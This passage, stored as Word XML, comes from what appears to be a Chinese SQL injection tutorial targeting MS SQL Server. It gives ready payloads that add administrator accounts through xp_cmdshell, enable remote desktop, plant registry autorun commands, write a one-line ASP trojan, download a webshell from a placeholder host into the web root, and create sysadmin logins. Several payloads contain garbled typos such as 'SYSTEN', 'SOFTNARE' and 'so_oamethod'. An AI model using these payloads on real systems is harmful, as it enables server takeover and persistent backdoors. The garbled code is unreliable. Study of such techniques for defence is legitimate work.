          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFDB86" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00E578D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执行上面的查询，即可添加一个用户名和密码都为test的管理员账号。然后可以利用命令打开3389远程终端连接，并修改终端连接端口号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E956743"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cmdshell 'sc config termservice start = auto'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A76F65"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cmdshell 'net start termservice'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566971D9"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 xml:space="preserve">;exec master..xp_cmdshell 'reg add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26416AEC"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HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal</w:t>
      </w:r>
      <w:r w:rsidR="00E64839">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Server"/v </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFB873"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fDenyTSConnections /t REG_DWORD /D 0X0 /F' //允许外部连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E43F004" w14:textId="77777777" w:rsidR="00197980"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exec master..xp_cmdshell 'reg add "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B93EE" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00197980"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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEN\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"/v PortNumber /t REG_DWORD' //改端口到80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747006E" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="005C1F4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事实上，只要可以执行系统命令，几乎任意的攻击操作都可在此基础上实现进行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E8562C" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="007D3077" w:rsidRDefault="00E7503C" w:rsidP="00A33737">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. xp_regwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作注册表与开启沙盒模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413ECA80" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00821325" w:rsidP="00A33737">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sa权限下可以调用xp_regwrite写入注册表，查询语句如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB5549" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="008C577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xp_regwrite'</w:t>
      </w:r>
      <w:r w:rsidR="00600A02" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HKEY_LOCAL</w:t>
      </w:r>
      <w:r w:rsidR="00600A02" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33A19D" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="008C5777"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black','REG_SZ','net user test test /add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC0AE7" w14:textId="77777777" w:rsidR="00315A49" w:rsidRPr="00764DAB" w:rsidRDefault="00315A4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这里是写入注册表启动项，系统启动后就会执行“net user test westone”命令，从而在服务器上添加一个test账户。当服务器重新启动登录时，就会自动执行命令添加指定的账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB3E54" w14:textId="77777777" w:rsidR="00315A49" w:rsidRPr="00764DAB" w:rsidRDefault="00315A4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还可以利用xp_regwrite来开启沙盒模式，从而执行系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022BA1E" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00315A4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开启沙盒模式，在注入点处提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4ABAB6" w14:textId="77777777" w:rsidR="000A3DD1" w:rsidRPr="00BF1BD2" w:rsidRDefault="000A3DD1"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lastRenderedPageBreak/>
        <w:t>execmaster..xp regwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9A4BC" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="000A3DD1"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HKEY_LOCAL_MACHINE','SOFTNARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG DWORD',l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E617C80" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00EA171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然后利用jet.oledb执行如下系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF22589" w14:textId="77777777" w:rsidR="00EA171A" w:rsidRPr="00BF1BD2" w:rsidRDefault="00EA171A"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select * from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096D1B5" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00EA171A"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penrowset('microsoft.jet.oledb.4.O',';database=c:\windows\system32\ias\ias.mdb','select shell("net user test test /add")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7FDE6" w14:textId="77777777" w:rsidR="007B1E7D" w:rsidRPr="00764DAB" w:rsidRDefault="007B1E7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注意，如果注入点的参数是integer数字型，就可指定“ias.mdb”数据库;如果是string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D41EAD" w14:textId="77777777" w:rsidR="007B1E7D" w:rsidRPr="00764DAB" w:rsidRDefault="007B1E7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字符型，则可指定连接dnary.mdb.如果是Windows 2000系统，数据库的路径应该指定为</w:t>
      </w:r>
      <w:r w:rsidR="001A202D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA97637" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="007B1E7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x:\winnt\system32\ias\ias.mdb"。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28EBA2" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="007D3077" w:rsidRDefault="007B1E7D" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sp_makewebtask</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E45C8C" w14:textId="77777777" w:rsidR="007B1E7D" w:rsidRPr="00764DAB" w:rsidRDefault="007B1E7D"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sa权限可以通过sp_makewebtask，创建一项生成HTML文档的任务，该文档包含执行过的查询返回的数据。在入侵测试的过程中，可以利用sp_makewebtask扩展存储来将一句话木马写入到服务器磁盘中的Web目录下，从而获得对服务器的控制权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF57A1" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="007B1E7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写入一句话木马前，首先需要将一句话木马转换成URL格式。然后执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16917D21" w14:textId="77777777" w:rsidR="00634A4C" w:rsidRPr="00BF1BD2" w:rsidRDefault="00634A4C"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 xml:space="preserve">exec sp_makewebtask </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A12F5" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00634A4C"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c:\inetpub\wwwroot\yjh.asp','select'' %3C%25%65%78%65%63%75%74%65 %72%65%71%75%65%73%74%28%22%76%61%6C%75%65%22%29%25%3E'''--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74363524" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="007D3077" w:rsidRDefault="00634A4C" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sp_oacreate</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储远程下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA194BF" w14:textId="77777777" w:rsidR="00B80B41" w:rsidRPr="00764DAB" w:rsidRDefault="00B80B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sa权限下还可以调用sp_oacreate存储过程来完成更多功能，例如远程下载文件到服务器上，从而间接获得一个WebShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D4482A" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00B80B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这里可以将一个WebShell文件上传到某个网站空间中，假设文件链接地址如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E158DD" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00D269A4" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidR="00206432" w:rsidRPr="00764DAB">
          <w:rPr>
            <w:rFonts w:cs="Times New Roman"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.test.com/teat.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="511AD573" w14:textId="77777777" w:rsidR="00206432" w:rsidRPr="00764DAB" w:rsidRDefault="0020643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查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B7B57"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DECLARE   @B   varbinary(8000),@hr   int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553774EC"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http   INT,@down   INT   EXEC   sp_oacreate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D640A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Microsoft.XMLHTTP],@http  output    EXEC  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43B977"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hr  =  sp_oamethod    @http,[Open],null,[GET],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632EB7EF"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http://www.test.com/test.txt],O EXEC @hr = sp_oamethod @http,[Send],null EXEC @hr=sp_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12534463"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AGetProperty @http,[responseBody],@B output EXEC @hr=sp_oacreate  [ADODB.Stream],@down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F734769"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output EXEC @hr=sp_OAGetProperty @down, [Type],1 EXEC @hr=sp OASetProperty @down,[mode],3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24873886" w14:textId="77777777" w:rsidR="00206432"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hr=sp_oamethod @down,[Open],null EXEC @hr=sp_oamethod @down,[Write],null,@B EXEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72903B0D" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00206432"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hr=so_oamethod @down,[SaveToFile].null.(c:\inetpub\wwwroot\WebShell.asp],l -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223661C7" w14:textId="77777777" w:rsidR="00E90C68" w:rsidRPr="00764DAB" w:rsidRDefault="00E90C6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即可下载文件“http://www.test.con/test.txt”的内容到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51D31B" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00E90C6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c</w:t>
      </w:r>
      <w:r w:rsidR="0027401F" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\inetpub\wwwroot\WebShell.asp"</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功写入一个WebShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C750C" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="007D3077" w:rsidRDefault="0026133E" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5. sp_addlogin</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展管理数据库用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C316B7" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="004A2F8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要添加和删除一个sa权限的数据库用户，可执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B3DA6" w14:textId="77777777" w:rsidR="00172869" w:rsidRPr="00BF1BD2" w:rsidRDefault="0017286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dbo.sp_addlogin test,password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88FAF9" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00172869"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dbo.sp_addsrvrolemember test,sysadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110EAFD" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="007D3077" w:rsidRDefault="00CC205B" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6. xp_servicecontrol</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113BF28" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00167CE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要停掉或激活某个服务，可利用xp_servicecontrol扩展执行查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9933CE" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00427B7D"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servicecontrol 'stop','schedule'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69652A3E" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00C2491F"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_servicecontrol 'start','schedule'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69128681" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00C2491F"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exec master..xp servicecontrol 'start','server'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEF7FB" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00C451E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此外，通过扩展存储，还可以进行差异备份写入WebShell，设置数据库允许远程连接等各种危险的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C07FC" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00664072" w:rsidRDefault="003D5726" w:rsidP="003D5726">
      <w:pPr>
        <w:pStyle w:val="3"/>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2.2.4</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008564A4" w:rsidRPr="00664072">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dbowner权限下的扩展攻击利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B4A68" w14:textId="77777777" w:rsidR="008564A4" w:rsidRPr="00764DAB" w:rsidRDefault="008564A4"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数据库连接账户为dbowner权限时，无法直接利用扩展存储执行各种系统命令，进行攻击的过程比较烦琐。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3234ED" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="008564A4" w:rsidP="001A202D">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注入点为dbo权限时，通常首先利用xp_dirtree扩展存储列出Web目录，然后利用SQL语句创建一个临时表，插入一句话木马到临时表中。然后利用数据库备份语句，将数据库备份到Web目录并保存为ASP格式的文件，即可得到一个一句话木马后门。最后利用一句话木马客户端连接后门，得到WebShell后就可以控制整个服务器了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2523F8" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00527CFD" w:rsidRDefault="000B06FB" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断数据库用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE19996" w14:textId="77777777" w:rsidR="00ED2FEC" w:rsidRPr="00764DAB" w:rsidRDefault="00ED2FEC"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需要判断当前数据库用户是否为db_owner权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE0E0D" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00ED2FE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后执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDB442" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="005830F6"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and 1=(SELECT IS_MEMBER('db_owner'));--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F90FE9" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00B725B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页面返回正常，说明的确是db_owner权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE43682" w14:textId="77777777" w:rsidR="00CA1C0A" w:rsidRPr="00527CFD" w:rsidRDefault="00CA1C0A" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C0366" w14:textId="77777777" w:rsidR="00CA1C0A" w:rsidRPr="00764DAB" w:rsidRDefault="00CA1C0A"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Web服务器与数据库在同一服务器主机上时，就可以备份一句话木马到Web目录了。但是在备份一句话木马前，首先需要搜索Web目录，可通过如下几个步骤实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB48A8" w14:textId="77777777" w:rsidR="00CA1C0A" w:rsidRPr="00764DAB" w:rsidRDefault="00CA1C0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执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F1E64" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="0028412D" w:rsidP="00BF1BD2">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drop</w:t>
      </w:r>
      <w:r w:rsidR="00B577CA">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table black</w:t>
      </w:r>
      <w:r w:rsidR="00664072" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003D6B16" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>create table temp(dir nvarchar (255), depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY (1,1));--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D8F24" w14:textId="77777777" w:rsidR="00D55AAC" w:rsidRPr="00764DAB" w:rsidRDefault="00D55AA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该语句可创建一个临时表，一共4个字段，前三个字段用于存放执行存储过程xp_dirtree返回的结果，ID字段则方便查询指定内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778FD05" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="00D55AA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然后执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F715A" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00DC3DC6" w:rsidP="00BF1BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;insert into temp(dir,depth,files) exec master.dbo.xp_dirtree 'c:',1,1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC4213" w14:textId="77777777" w:rsidR="008C132D" w:rsidRPr="00764DAB" w:rsidRDefault="008C13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利用xp_dirtree扩展查询，将指定目录的文件和文件夹名称插入到临时表中，这里查询的是C盘目录路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FDA30" w14:textId="77777777" w:rsidR="00E578DE" w:rsidRPr="00764DAB" w:rsidRDefault="008C132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再执行如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2284D" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00BF1BD2" w:rsidRDefault="00D811A6" w:rsidP="00BF1BD2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select dir from temp where id=1)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="4230C2AD" w14:textId="77777777" w:rsidR="004D7FDC" w:rsidRPr="00764DAB" w:rsidRDefault="004159EA" w:rsidP="001A202D">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语句是查询临时表中的内容，也就是指定的目录文件和文件夹名。由于不能一次性获取所</w:t>
      </w:r>
      <w:r w:rsidR="004D7FDC" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有目录文件和文件夹名，因此需要更改ID的值，依次列出文件和文件夹来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9433B" w14:textId="77777777" w:rsidR="006201CC" w:rsidRDefault="004D7FD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通过此方法，可以遍历所有盘符，从而找到Web目录路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F852D36" w14:textId="77777777" w:rsidR="00C16530" w:rsidRPr="00527CFD" w:rsidRDefault="00C16530" w:rsidP="00C16530">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
